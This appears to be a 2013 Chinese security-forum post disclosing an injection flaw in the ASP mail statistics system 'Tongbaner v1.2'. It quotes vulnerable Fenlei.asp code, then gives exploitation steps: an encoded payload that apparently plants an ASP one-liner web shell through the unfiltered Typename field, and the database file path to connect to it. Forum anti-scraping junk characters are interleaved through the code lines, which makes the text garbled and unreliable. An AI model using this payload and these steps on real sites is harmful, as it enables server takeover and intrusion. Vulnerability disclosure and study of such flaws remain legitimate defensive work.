找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2057|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp $ h3 p" u! h* t+ ~

( Z1 `* {  G7 b* ]/ UIF Request.QueryString("Action")="del" Then 3 g5 D2 h8 }: E& g, l
ID=Request.QueryString("ID")
' p4 l4 W# w3 xIF Countss ("tui","Fenlei",ID )<>0 then 0 ?2 F$ U( J% K6 y! z, y
'略 ) A) D( M/ r4 J# k, o3 ~) K9 |
IF Request.QueryString("Action")="Add" Then
; W$ a7 R$ `- c- ~0 U! QTname=Request.Form("Typename")
4 m5 f5 h9 M6 Q6 xSet Rs=Server.CreateObject("adodb.Recordset") 9 D) j& w7 {3 E6 h5 t
Sql="Select * From Fenlei Order by id Desc "
8 Y! ~) }$ @' x& y2 U* u! LRs.Open Sql,Conn,1,3
/ `4 W4 W4 D: C* F' j1 |( t* [Rs.Addnew
# b2 |- f) d" V: DRs("Typename")=Tname . ?; T3 y3 |- C- U7 K
'略
! U/ W; v' x0 DSet Rs=Server.CreateObject("adodb.Recordset")
$ h' |- u- R$ X3 o1 j1 eSql="Select * From Fenlei Order by id Desc "
7 N' q" O- A& }  vRs.Open Sql,Conn,1,1 3 a2 o1 v, o$ K4 ~9 D0 v0 _8 \
'略
: q1 V- @9 F0 T! _+ D1 M3 W. c%>
/ J# R4 s4 F8 {: |1 ?' _$ _
% f: x8 k% T) I  C& i3 N- r 6 [$ O$ c8 L8 I* d& J9 |& V0 r
0 T- K2 x7 p8 g) i3 w$ B; R
没有过滤,直接写入数据库。
" j5 c3 W& Q* t  Z# o% F* ] - a  X* L' g3 F0 @) R) X9 k  i
利用方法:
8 B7 T5 K, n4 p. x! c
2 O% C; R! W) ?+ R  c$ f/ y+ Q插入:┼攠數畣整爠煥敵瑳∨≡┩>
  z' J) U* x& O3 P5 X
# w! G5 Y% i4 v 2 c! i7 m7 k% `' u6 X9 G
连接: http://www.xxx.com/###tongbaner.asa
, |7 F2 W* _' F  B1 j! \'默认安装文件:
7 u) i- l+ l6 k3 W'install.asp
, d( v6 ], m0 z0 Z: k" S  [6 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表